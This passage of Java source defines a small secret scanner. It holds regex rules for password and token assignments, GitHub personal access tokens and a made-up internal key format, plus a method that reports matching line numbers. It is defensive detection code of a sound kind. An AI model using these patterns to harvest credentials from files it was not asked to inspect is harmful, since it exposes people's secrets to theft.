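    static final Map<String, Pattern> RULES = new LinkedHashMap<>();
    static {
        // Generic assignment of a secret-looking key (illustrative).
        RULES.put("generic-assignment",
                Pattern.compile("(?i)(password|passwd|secret|token)\\s*[:=]\\s*\\S+"));
        // Loose GitHub personal access token prefix (illustrative).
        RULES.put("github-pat", Pattern.compile("\\bghp_[A-Za-z0-9]{20,}"));
        // Hypothetical organization-specific secret format.
        RULES.put("acme-internal", Pattern.compile("\\bACME_INTERNAL_[A-F0-9]{32}\\b"));
    }

    // Returns findings as "lineNumber:ruleName", in line order.
    static List<String> scan(String text) {
        List<String> findings = new ArrayList<>();
        String[] lines = text.split("\\R", -1);
        for (int i = 0; i < lines.length; i++) {
            for (Map.Entry<String, Pattern> rule : RULES.entrySet()) {
                if (rule.getValue().matcher(lines[i]).find()) {
                    findings.add((i + 1) + ":" + rule.getKey());
                }
            }
        }
        return findings;
    }
}
```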